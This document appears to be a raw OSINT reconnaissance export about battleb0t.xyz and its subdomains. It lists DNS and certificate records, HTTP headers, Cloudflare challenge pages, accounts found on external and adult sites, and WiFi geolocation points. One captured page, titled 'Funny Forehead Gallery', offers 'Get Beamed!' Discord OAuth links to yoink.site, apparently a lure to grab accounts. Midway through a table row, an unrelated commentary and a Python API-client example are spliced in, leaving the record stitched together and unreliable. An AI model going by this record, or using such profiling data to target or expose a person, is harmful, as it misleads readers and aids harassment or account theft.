| 2023-05-12 02:57:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://tinyurl.com/madeinsuisse', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.20.138.65:443"\n "34.148.97.127:443"\n "3.125.5.245:443"\n "35.157.185.185:443"\n "172.253.122.95:443"\n "205.185.216.10:443"\n "104.18.22.52:443"\n "172.217.2.104:443"\n "172.64.202.28:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar53E7.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar5349.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar52DA.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar515F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar5190.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': 
| 34.148.97.127 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f603759cec44a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '16187',
cRay: '7c5f603759cec44a',
cHash: '5c1bdda96dc3363',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MDA1My42NjAwMDA=',
m: 'lfsFj6DGCrI2vGPf6BjuX9qKC3b3WJbZzI/myE7y0Ig=',
i1: 'Gu/vYOwR5DI39saTFLv/iA==',
i2: 'jBLnZ6zLXxRsowEZI/3brw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f603759cec44a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f603759cec44a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | Bootstrap | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | babepedia (Category: XXXPORNXXX)
https://www.babepedia.com/user/login | login |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F0:17:4A) | 37.780462,-122.390564 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | trakt (Category: video)
https://trakt.tv/users/login | login |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.106 | 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | luna (Net ID: 00:02:2D:2D:B8:C7) | 50.1188, 8.6843 |
| 2023-05-12 03:00:24 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@lu.ma | |
| 2023-05-12 02:54:23 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H061ZY9N5FV8EXSVB32WY78R
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/Battleb0t | Battleb0t |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 16 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | nuke.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:27 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://oldfluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://oldfluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] | oldfluid.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Snapchat Stories (Category: social)
https://story.snapchat.com/s/login | login |
| 2023-05-12 02:56:27 | Hash | No | Hash Extractor | 0 | 0 | 3 | 0 | None | [MD5] 02ca825e4901e74c2c2d6f8e59341325 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses its own API keys to authenticate requests. You can either host this API on your own server and define keys there, or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding
<code>?key=token</code> to the end of API requests, or use an authorization header by adding an <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints return JSON. Every response carries a <code>status</code> key that matches the HTTP status code; successful responses add a
<code>data</code> key and failed responses add a <code>reason</code> key.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (a valid
<code>key</code> query parameter or an <code>Authorization</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name, or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate limit was reached (the API returns
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API, or the Hypixel API returned an unknown error code. Please report these errors on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixel's API is experiencing technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixel's API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixel's API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code> /v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>The UUID or name of a user</td>
</tr>
<tr>
<td>profile</td>
<td>The user's profile ID or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types used to describe how an item's value was calculated</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
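The authentication and response conventions in the embedded SkyHelper documentation above (key as `?key=` or as a raw `Authorization` header; a JSON envelope with `status`, `data` and `reason`; `RateLimit-Reset` on 429), as an added example. This is not the SkyHelper project's own client code: the base URL, the key value, the player name and the sample responses are placeholders constructed for illustration. The point a practitioner should take from it is the choice between the two documented key-passing methods and the refusal to trust a response that does not fit the documented envelope.

```python
import json
from dataclasses import dataclass
from typing import Any, Mapping, Optional
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Placeholder base URL: the documentation above does not state the service host.
BASE_URL = "https://skyhelper.example/v2"
USER_AGENT = "skyhelper-client-example/1.0"


def build_request(path: str, api_key: str, use_header: bool = True) -> tuple:
    """Return (url, headers) for an authenticated request.

    The docs accept the key either as `?key=` or as a raw Authorization header
    value. Prefer the header: query strings end up in web-server and proxy
    access logs, browser history and Referer headers, so a key passed that way
    leaks far more easily than one carried in a header.
    """
    url = BASE_URL + path
    headers = {"User-Agent": USER_AGENT, "Accept": "application/json"}
    if use_header:
        headers["Authorization"] = api_key  # bare token, no "Bearer" prefix, as documented
    else:
        parts = urlsplit(url)
        query = dict(parse_qsl(parts.query))
        query["key"] = api_key
        url = urlunsplit(parts._replace(query=urlencode(query)))
    return url, headers


@dataclass(frozen=True)
class ApiResult:
    ok: bool
    status: int
    data: Any = None
    reason: Optional[str] = None
    retry_after: Optional[int] = None  # seconds until the upstream rate limit resets (429 only)


def parse_response(status: int, headers: Mapping[str, str], body: str) -> ApiResult:
    """Interpret a response according to the documented envelope.

    `status` in the JSON must mirror the HTTP status; `data` is present on 200,
    `reason` on every error. Anything that does not fit (non-JSON body, status
    mismatch) is reported as an error rather than trusted, because that shape
    is exactly what a CDN challenge page or proxy error page looks like.
    """
    try:
        payload = json.loads(body)
    except ValueError:
        return ApiResult(False, status, reason="non-JSON body; not an API response")
    if not isinstance(payload, dict) or payload.get("status") != status:
        return ApiResult(False, status, reason="envelope status does not match HTTP status")
    if status == 200:
        return ApiResult(True, status, data=payload.get("data"))
    retry_after = None
    if status == 429:
        lowered = {k.lower(): v for k, v in headers.items()}
        reset = lowered.get("ratelimit-reset")
        if reset is not None and reset.isdigit():
            retry_after = int(reset)
    return ApiResult(False, status, reason=payload.get("reason", "unspecified"),
                     retry_after=retry_after)
```

Keep the key out of the URL unless the header path is impossible; if it must go in the query string, make sure the client never follows a redirect to another host with the query intact.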
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01039402468.github.io | 185.199.111.153 |
| 2023-05-12 02:44:31 | Internet Name | No | DNS Resolver | 17 | 0 | 2 | 0 | None | panel.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
